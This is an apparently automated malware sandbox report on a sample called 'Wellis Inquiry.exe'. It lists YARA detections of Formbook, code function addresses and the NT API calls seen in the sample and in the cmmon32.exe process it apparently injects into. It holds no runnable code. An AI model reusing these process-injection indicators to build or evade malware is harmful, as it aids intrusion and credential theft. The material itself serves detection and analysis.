Source: Yara match	File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Wellis Inquiry.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 0_2_0176E9D0	0_2_0176E9D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 0_2_0176C9DC	0_2_0176C9DC
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 0_2_0176E9C0	0_2_0176E9C0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041C95D	3_2_0041C95D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00401174	3_2_00401174
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041BA2C	3_2_0041BA2C
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041CBBB	3_2_0041CBBB
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00408C7B	3_2_00408C7B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00408C80	3_2_00408C80
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00402D87	3_2_00402D87
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BF900	3_2_011BF900
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D4120	3_2_011D4120
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0128E824	3_2_0128E824
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271002	3_2_01271002
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA830	3_2_011DA830
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012820A8	3_2_012820A8
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CB090	3_2_011CB090
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E20A0	3_2_011E20A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012828EC	3_2_012828EC
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01282B28	3_2_01282B28
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DAB40	3_2_011DAB40
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EEBB0	3_2_011EEBB0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127DBD2	3_2_0127DBD2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012703DA	3_2_012703DA
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0126FA2B	3_2_0126FA2B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012822AE	3_2_012822AE
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01282D07	3_2_01282D07
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B0D20	3_2_011B0D20
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01281D55	3_2_01281D55
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2581	3_2_011E2581
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012825DD	3_2_012825DD
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CD5E0	3_2_011CD5E0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C841F	3_2_011C841F
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127D466	3_2_0127D466
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01281FF1	3_2_01281FF1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0128DFCE	3_2_0128DFCE
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D6E30	3_2_011D6E30
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127D616	3_2_0127D616
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01282EF7	3_2_01282EF7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479D466	11_2_0479D466
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E841F	11_2_046E841F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A1D55	11_2_047A1D55
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D0D20	11_2_046D0D20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A2D07	11_2_047A2D07
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046ED5E0	11_2_046ED5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A25DD	11_2_047A25DD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581	11_2_04702581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F6E30	11_2_046F6E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479D616	11_2_0479D616
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A2EF7	11_2_047A2EF7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A1FF1	11_2_047A1FF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047ADFCE	11_2_047ADFCE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047AE824	11_2_047AE824
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA830	11_2_046FA830
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791002	11_2_04791002
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A28EC	11_2_047A28EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047020A0	11_2_047020A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A20A8	11_2_047A20A8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EB090	11_2_046EB090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F4120	11_2_046F4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DF900	11_2_046DF900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F99BF	11_2_046F99BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0478FA2B	11_2_0478FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB236	11_2_046FB236
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794AEF	11_2_04794AEF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A22AE	11_2_047A22AE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAB40	11_2_046FAB40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0477CB4F	11_2_0477CB4F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A2B28	11_2_047A2B28
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FA309	11_2_046FA309
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047823E3	11_2_047823E3
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047903DA	11_2_047903DA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470ABD8	11_2_0470ABD8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479DBD2	11_2_0479DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470EBB0	11_2_0470EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470138B	11_2_0470138B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3BA2C	11_2_02D3BA2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3CBBB	11_2_02D3CBBB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3C95D	11_2_02D3C95D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D22FB0	11_2_02D22FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D28C80	11_2_02D28C80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D28C7B	11_2_02D28C7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D22D90	11_2_02D22D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D22D87	11_2_02D22D87

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: String function: 011BB150 appears 54 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 046DB150 appears 136 times

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_004185E0 NtCreateFile,	3_2_004185E0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00418690 NtReadFile,	3_2_00418690
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00418710 NtClose,	3_2_00418710
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_004187C0 NtAllocateVirtualMemory,	3_2_004187C0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_004185DA NtCreateFile,	3_2_004185DA
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041868A NtReadFile,	3_2_0041868A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041870A NtClose,	3_2_0041870A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_011F9910
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F99A0 NtCreateSection,LdrInitializeThunk,	3_2_011F99A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9840 NtDelayExecution,LdrInitializeThunk,	3_2_011F9840
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_011F9860
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F98F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_011F98F0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_011F9A00
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9A20 NtResumeThread,LdrInitializeThunk,	3_2_011F9A20
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9A50 NtCreateFile,LdrInitializeThunk,	3_2_011F9A50
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9540 NtReadFile,LdrInitializeThunk,	3_2_011F9540
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F95D0 NtClose,LdrInitializeThunk,	3_2_011F95D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9710 NtQueryInformationToken,LdrInitializeThunk,	3_2_011F9710
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9780 NtMapViewOfSection,LdrInitializeThunk,	3_2_011F9780
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F97A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_011F97A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9FE0 NtCreateMutant,LdrInitializeThunk,	3_2_011F9FE0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_011F9660
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F96E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_011F96E0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9950 NtQueueApcThread,	3_2_011F9950
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F99D0 NtCreateProcessEx,	3_2_011F99D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9820 NtEnumerateKey,	3_2_011F9820
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011FB040 NtSuspendThread,	3_2_011FB040
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F98A0 NtWriteVirtualMemory,	3_2_011F98A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9B00 NtSetValueKey,	3_2_011F9B00
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011FA3B0 NtGetContextThread,	3_2_011FA3B0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9A10 NtQuerySection,	3_2_011F9A10
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9A80 NtOpenDirectoryObject,	3_2_011F9A80
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011FAD30 NtSetContextThread,	3_2_011FAD30
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9520 NtWaitForSingleObject,	3_2_011F9520
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9560 NtWriteFile,	3_2_011F9560
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F95F0 NtQueryInformationFile,	3_2_011F95F0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011FA710 NtOpenProcessToken,	3_2_011FA710
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9730 NtQueryVirtualMemory,	3_2_011F9730
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011FA770 NtOpenThread,	3_2_011FA770
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9770 NtSetInformationFile,	3_2_011F9770
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9760 NtOpenProcess,	3_2_011F9760
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9610 NtEnumerateValueKey,	3_2_011F9610
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9650 NtQueryValueKey,	3_2_011F9650
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F9670 NtQueryInformationProcess,	3_2_011F9670
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F96D0 NtCreateKey,	3_2_011F96D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719540 NtReadFile,LdrInitializeThunk,	11_2_04719540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047195D0 NtClose,LdrInitializeThunk,	11_2_047195D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719660 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_04719660
